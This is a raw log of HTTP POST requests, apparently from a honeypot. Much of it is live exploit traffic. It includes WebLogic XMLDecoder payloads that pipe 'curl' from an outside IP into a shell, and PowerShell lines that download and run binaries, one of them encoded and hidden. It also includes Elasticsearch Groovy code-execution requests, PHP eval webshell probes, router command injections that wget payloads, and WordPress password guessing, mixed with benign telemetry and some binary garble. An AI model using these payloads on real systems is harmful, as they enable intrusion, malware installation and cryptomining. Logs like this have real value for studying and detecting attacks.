User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:5.0) Gecko/20100101 Firefox/5.0
Connection: Close
Content-Type: text/xml
Content-Length: 1187
POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)
Ål÷yyÃ≈*ÄH!O“§∞î˛º¶º¶º·Ê•¡Ã∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±∏s≈¡®ºƒ‹Õ–·ÈÁ·
∞îìD!Y›∆√«∆fl
POST http://behacdn.ksmobile.net/cfcl HTTP/1.1
Accept-Encoding: gzip
Charset: UTF-8
Content-Type: multipart/form-data; boundary=----------------------------7d92221b604bc
User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.4.4; MI 4LTE MIUI/V7.00.55.00.KXDMICI)
Host: behacdn.ksmobile.net
Connection: Keep-Alive
Content-Length: 38
&KÜWÍÕ`i'c
K6ÍoòKÌVcpjBhC*8kä^H
POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:5.0) Gecko/20100101 Firefox/5.0
Connection: Close
Content-Type: text/xml
Content-Length: 1214
POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)
Å›Ño'Ã≈*ÄH!O“§∞î˛º¶º¶º·Ê•¡Ã∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±∏s≈¡®ºƒ‹Õ–·ÈÁ·
∞îÄ5-Y›∆√«∆fl
POST /w.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 48
leng=die('Hello, Peppa!'.(string)(111111111*9));
POST /_search?pretty HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded; Charset=UTF-8
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Accept-Language: zh-CN
Referer: http://x.x.x.x:9200/_search?pretty
User-Agent: Java/1.8.0_31
Content-Length: 409
Host: x.x.x.x:9200
{"size":1,"script_fields": {"exp": {"script":"java.lang.Math.class.forName(\"java.io.BufferedReader\").getConstructor(java.io.Reader.class).newInstance(java.lang.Math.class.forName(\"java.io.InputStreamReader\").getConstructor(java.io.InputStream.class).newInstance(java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"echo qq952135763\").getInputStream())).readLines()","lang": "groovy"}}}
POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>
POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; ASJB; rv:11.0) like Gecko
Host: x.x.x.x
Content-Length: 368
Cache-Control: no-cache
AVO2mHJEUjgYaxHqdThnOStuWP76LambRhrvpB4+yi+YiIGCncx0mnB8gT3kPYMYwF8S3BN7TcBiBLaZvYSWBQElz1zDJd3M/vvZwoniP/iFmWBgCr+EoQlfy5YAAiAR3zQaoBLPmkrVefbg7SWVIUrWY/oWT5sq8O/zDsZ5RFa+7A88S3R4/BDcV08oUTwJQvHceuu92vNndG2wC1qfj+YYmwoG1XsfcWqtMimnj5OkhsUdRYAEN6AiHhksS7GzHkGvX4JROruEr7gvsq+xWVVDu20cguC4+NMsOfBZjNTKlFsX+T1fM++ZP0w8SiDB/IPsP5F88ZgiRT8E0onM5KTHo6tjlk9EvOVJdpilN94CRaI=
POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)
Å%ÑlhÃ≈*ÄH!O“§∞î˛º¶º¶º·Ê•¡Ã∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±∏s≈¡®ºƒ‹Õ–·ÈÁ·∞î¯+Y›∆√«∆fl
POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Content-Type: text/xml
Accept: text/html, application/xhtml+xml, */*
Accept-Encoding: gbk, GB2312
Accept-Language: zh-cn
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Upgrade-Insecure-Requests: 1
Content-Length: 850
Host: x.x.x.x:7001
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.8.0_131" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>cmd</string>
</void>
<void index="1">
<string>/c</string>
</void>
<void index="2">
<string>powershell (new-object System.Net.WebClient).DownloadFile('http://down.kingminer.club/downloader.exe','C:/Windows/temp/esentur.exe');start C:/Windows/temp/esentur.exe</string>
</void>
</array>
<void method="start"/></void>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>
POST http://check.proxyradar.com/azenv.php?auth=149594824019&a=PSCMN&i=1082769120&p=80 HTTP/1.1
Cookie: testCookie=true
Host: check.proxyradar.com
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Referer: https://proxyradar.com/
Content-Type: application/x-www-form-urlencoded
Content-Length: 13
Connection: close
testPost=true
POST /db.init.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 48
eval=die('Hello, Peppa!'.(string)(111111111*9));
POST http://cfg.cml.ksmobile.com/post HTTP/1.1
Accept-Encoding: gzip
Content-Length: 1079
Content-Type: multipart/form-data; boundary=4TQlPuZ8FHjkTb6IqpcNcm7WqTSgZ6p5zN1MJova
Host: cfg.cml.ksmobile.com
Connection: Keep-Alive
--4TQlPuZ8FHjkTb6IqpcNcm7WqTSgZ6p5zN1MJova
Content-Disposition: form-data; name="protocver"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
1
--4TQlPuZ8FHjkTb6IqpcNcm7WqTSgZ6p5zN1MJova
Content-Disposition: form-data; name="ran"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
566461
--4TQlPuZ8FHjkTb6IqpcNcm7WqTSgZ6p5zN1MJova
Content-Disposition: form-data; name="sig"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
eb3b322044d603fe5bc6be18194ec292
--4TQlPuZ8FHjkTb6IqpcNcm7WqTSgZ6p5zN1MJova
Content-Disposition: form-data; name="flag"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
0
--4TQlPuZ8FHjkTb6IqpcNcm7WqTSgZ6p5zN1MJova
Content-Disposition: form-data; name="data"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
{"module":"searchengine","mcc":"510","sdkver":"1.14","appname":"iswipe","did":"6ccc52a8048214f","modulever":"39","language":"in_ID","channel":"2010002546"}
--4TQlPuZ8FHjkTb6IqpcNcm7WqTSgZ6p5zN1MJova--
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; InfoPath.3; .NET4.0E)
Host: x.x.x.x
Content-Length: 380
Cache-Control: no-cache
RKUNx9nJbGyJgjFOcs7HMnj04l8+krBHq6LeV7LoMnNis4r+UlDRg4LJzK5vv/3bn03VBW2NRROtpmV2mi82aoG+x96fkJIGdVI5WZ16FM6MRnG3o3CeWG1Vw7Re6rtNEssa0oFXAQDlaQXZf0RiUyvUGUu0xKSh8Sg33GcwGaMbH0wJytcWtzKaIxCJau1v/D+ZrqN3CcFejgIJa3aEYVYlytYkoViM+5gTRFxJQWLAcLy7v2xxIAcftX/NVWaA7krBhaMKBSbKhcEA6rqokIdD0uhp5AzV2hQs1EAhXGe8N4o0EHCllHZXTrbBHb8nYIotbz3V8K9LMUUMFb76MiGxnfRHGYJ28hdm05poILT25v45iyatuMSobw==
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: x.x.x.x
Content-Length: 440
Cache-Control: no-cache
FKZWyNvAYJmQu7kGPkZXfx2Y4sXvqfXhQHlP7TXKvdygsKdD4F1F/C5bQJ13lgvPTcvA02aCXo//m8LJT0hS3TGuC3jKVV0kLQtSpERSHFWr3W4csLJLAJARspaj52nSLTL/Xv/w5uPhXwpyD6LevY8PctzK5rcE5WzyTdpcQAmXEO0cIdegNNgVFt2dG2hNncmfKQevfl+luiGAY2R+Sk5yppT4N88BxD3yBfogovqZWlfN6pPjHFzpHqBbay81S1dnNk4yAelw0Zj9XDc3Th0DDwZ+UX+7EgmYPKQmM8QLwFbWZ/xCCCf5sM+Mj57DtnGrSSak80J+EF6C3bFVVrgv8vcZT2ONjuEFDcS6fcAAticrXLpiqWzfoA+jMNPWLma+0Be6+mjqbsRtD68JgeMA7Mh7/4ylaztGeFzSVNM0jQ03HBV+eeI=
POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)
ÅWï◊lÃ≈*ÄH!O“§∞î˛º¶º¶º·Ê•¡Ã∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±∏s≈¡®ºƒ‹Õ–·ÈÁ·∞îÄU,Y›∆√«∆fl
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: x.x.x.x
Content-Length: 444
Cache-Control: no-cache
QfZdlNydbDv/zkUHRNi8uHXCk5Nh9Mg467GyaTIQVa/k3/lIcVDsXwe/PsoWY0jEuuJi+bqDajZFKIfVus90+C7noYnfP6BeE68rDe72rwPxNtGEpS/Do7zuTlMT2kVN3aGKFShBTePWkqHKk1xSM0LeIpa1CYv7qk/9oN4lFJkwukCGsshrOlbTQrcb4TrT92275CoqRD5+Re3X8v/kWuQ2VZl/hyrKq7MlQQ39x4qZe4/4ZplHgwlWzoGUXdG1zdfQABFlsX8bbtqX+mhxmmwbPuk3ebLIdbPtgGhnOEYNp9/hBbgLYjRYAZ8GfRjB9UAFkuxUX0M6NiqqvnkzjfNhnbGOiU4lGS++9SemmaaPXxizraJPW+NzQGYchJeLqePsi1TjTW5v72Sa/gPuKreDFyBVDJLoKrquc4ds9l3yOWem7NX3Jzh1xGQi
POST http://check.proxyradar.com/azenv.php?auth=149365060359&a=PSCMN&i=1082769359&p=80 HTTP/1.1
Cookie: testCookie=true
Host: check.proxyradar.com
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Referer: https://proxyradar.com/
Content-Type: application/x-www-form-urlencoded
Content-Length: 13
Connection: close
testPost=true
POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; InfoPath.3; .NET4.0E)
Host: x.x.x.x
Content-Length: 408
Cache-Control: no-cache
QqVfxo+Zbc7sSyJiShpbSVH6fDyySdoBhLjH96BjvUP+63Vo6drUw1ymtPwu4h7SbVrCmmodOdvfei/wREqwGyi45KwTaA1NUPICw6qaAn/U74IKYIULs6t5NlfU4Atp56vpeY3IqJM9TCUCS3BQ+k97R5eqF72CAtNV7Fy8Ky8WJ6wAruSax9/+Zw15OfVLevwMrpwNBhVMldUW7GIwEiV2rG1MoNrKJU7kWy3EoyQKHCbWizVOi1+p7dnOLZtaW68VRO393zsWUDFrL/9694dBCdtP3DQVca/bf747nu/BG2NbEhIHAsSAGhjDUWPmUIRYAr9LYc2SXuv4yN4lkpecZ9DAdiSP08jV/UOzZY9S7pQKpXbtaDsWRcAXCxcLQxV/PCqHOAAoCzYXEfep8Aw4
POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:5.0) Gecko/20100101 Firefox/5.0
Connection: Close
Content-Type: text/xml
Content-Length: 1195
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.8.0_131" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>cmd.exe</string>
</void>
<void index="1">
<string>/c</string>
</void>
<void index="2">
<string>Start /Min PowerShell.exe -NoP -NonI -EP ByPass -W Hidden -E JABPAFMAPQAoAEcAVwBtAGkAIABXAGkAbgAzADIAXwBPAHAAZQByAGEAdABpAG4AZwBTAHkAcwB0AGUAbQApAC4AQwBhAHAAdABpAG8AbgA7ACQAVwBDAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAFcAQwAuAEgAZQBhAGQAZQByAHMAWwAnAFUAcwBlAHIALQBBAGcAZQBuAHQAJwBdAD0AIgBQAG8AdwBlAHIAUwBoAGUAbABsAC8AVwBMACsAIAAkAE8AUwAiADsASQBFAFgAIAAkAFcAQwAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADEAMQAuADIAMwAwAC4AMgAyADkALgAyADIANgAvAGkAbQBhAGcAZQBzAC8AdABlAHMAdAAvAEQATAAuAHAAaABwACcAKQA7AA==</string>
</void>
</array>
<void method="start"/>
</void>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>
POST http://check.proxyradar.com/azenv.php?auth=149453920177&a=PSCMN&i=1082769359&p=80 HTTP/1.1
Cookie: testCookie=true
Host: check.proxyradar.com
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Referer: https://proxyradar.com/
Content-Type: application/x-www-form-urlencoded
Content-Length: 13
Connection: close
testPost=true
POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>
POST http://check.best-proxies.ru/azenv.php?auth=146130369815649&a=PC&i=1760126605&p=1080 HTTP/1.1
Cookie: testCookie=true
Host: check.best-proxies.ru
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Referer: http://best-proxies.ru/
Content-Type: application/x-www-form-urlencoded
Content-Length: 13
Connection: close
testPost=true
POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>
POST /wp-login.php HTTP/1.1
Referer: http://jamesatchue.com/wp-login.php
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: jamesatchue.com
Content-Length: 34
Cache-Control: no-cache
log=jamesatchue&pwd=jamesatchue!@#
POST /cgi?2 HTTP/1.0
Accept: */*
Host: x.x.x.x
User-Agent: Wget(linux)
"Content-Type": text/plain
"Referer": 128.199.238.30/mainFrame.htm
Content-Length: 211
Content-Type: application/x-www-form-urlencoded
[IPPING_DIAG#0,0,0,0,0,0#0,0,0,0,0,0]0,6
dataBlockSize=64
timeout=1
numberOfRepetitions=1
host=127.0.0.1;cd /tmp ; wget http://domstates.su/archi.txt;
X_TP_ConnName=ewan_ipoe_s
diagnosticsState=Requested
POST /xw.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 45
h=die('Hello, Peppa!'.(string)(111111111*9));
POST /UD/act?1 HTTP/1.1
Host: x.x.x.x:7547
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
Content-Type: text/xml
Content-Length: 526
<?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://l.ocalhost.host/1;chmod 777 1;./1`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope>
post /_search?pretty HTTP/1.1
User-Agent: Java/1.8.0_31
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Type: application/x-www-form-urlencoded
Accept-Language: zh-CN
Referer: http://x.x.x.x:9200/_search?pretty
Content-Length: 409
Host: x.x.x.x:9200
Connection: Keep-Alive
{"size":1,"script_fields": {"exp": {"script":"java.lang.Math.class.forName(\"java.io.BufferedReader\").getConstructor(java.io.Reader.class).newInstance(java.lang.Math.class.forName(\"java.io.InputStreamReader\").getConstructor(java.io.InputStream.class).newInstance(java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"echo qq952135763\").getInputStream())).readLines()","lang": "groovy"}}}
POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)
Å…ùƒ4Ã≈*ÄH!O“§∞î˛º¶º¶º·Ê•¡Ã∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±∏s≈¡®ºƒ‹Õ–·ÈÁ·∞î,¥)Y›∆√«∆fl
POST /wp-login.php HTTP/1.1
Referer: http://jamesatchue.com/wp-login.php
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: jamesatchue.com
Content-Length: 34
Cache-Control: no-cache
log=jamesatchue&pwd=jamesatchue123
POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>
POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>
POST /UD/act?1 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
SOAPAction: urn:schemas-upnp-org:service:LANHostConfigManagement:1#SetDHCPServerConfigurable
Content-Type: text/xml
Host: x.x.x.x:7547
Content-Length: 420
Connection: Keep-Alive
POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>
POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)
ÅÁ*4?Ã≈*ÄH!O“§∞î˛º¶º¶º·Ê•¡Ã∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±∏s≈¡®ºƒ‹Õ–·ÈÁ·∞îzûY›∆√«∆fl
POST http://cfg.cml.ksmobile.com/post HTTP/1.1
Accept-Encoding: gzip
Content-Length: 1079
Content-Type: multipart/form-data; boundary=EAXSHOospjpGwY42PlYo3VUaP9QVTCEcC2k6bYsk
Host: cfg.cml.ksmobile.com
Connection: Keep-Alive
--EAXSHOospjpGwY42PlYo3VUaP9QVTCEcC2k6bYsk
Content-Disposition: form-data; name="protocver"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
1
--EAXSHOospjpGwY42PlYo3VUaP9QVTCEcC2k6bYsk
Content-Disposition: form-data; name="ran"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
423701
--EAXSHOospjpGwY42PlYo3VUaP9QVTCEcC2k6bYsk
Content-Disposition: form-data; name="sig"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
eb481ae7fb1f61ed4f38db475644465f
--EAXSHOospjpGwY42PlYo3VUaP9QVTCEcC2k6bYsk
Content-Disposition: form-data; name="flag"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
0
--EAXSHOospjpGwY42PlYo3VUaP9QVTCEcC2k6bYsk
Content-Disposition: form-data; name="data"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
{"module":"searchengine","mcc":"510","sdkver":"1.14","appname":"iswipe","did":"6ccc52a8048214f","modulever":"39","language":"in_ID","channel":"2010002546"}
--EAXSHOospjpGwY42PlYo3VUaP9QVTCEcC2k6bYsk--
POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)
ÅpÈ!3Ã≈*ÄH!O“§∞î˛º¶º¶º·Ê•¡Ã∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±∏s≈¡®ºƒ‹Õ–·ÈÁ·∞îHY›∆√«∆fl
POST /_search HTTP/1.1
Host: x.x.x.x:9200
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Content-Type: application/x-www-form-urlencoded
Content-Length: 170
{"size":1,"query":{"filtered":{"query":{"match_all":{}}}},"script_fields":{"msf_result":{"script":"java.lang.Math.class.forName(\"java.lang.Runtime\")","lang":"groovy"}}}
POST /wp-login.php HTTP/1.1
Referer: http://x.x.x.x/wp-login.php
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: x.x.x.x
Content-Length: 22
Cache-Control: no-cache
log=admin&pwd=11111111
POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)
Å∂ØmÃ≈*ÄH!O“§∞î˛º¶º¶º·Ê•¡Ã∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±∏s≈¡®ºƒ‹Õ–·ÈÁ·∞îäY›∆√«∆fl
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: x.x.x.x
Content-Length: 428
Cache-Control: no-cache
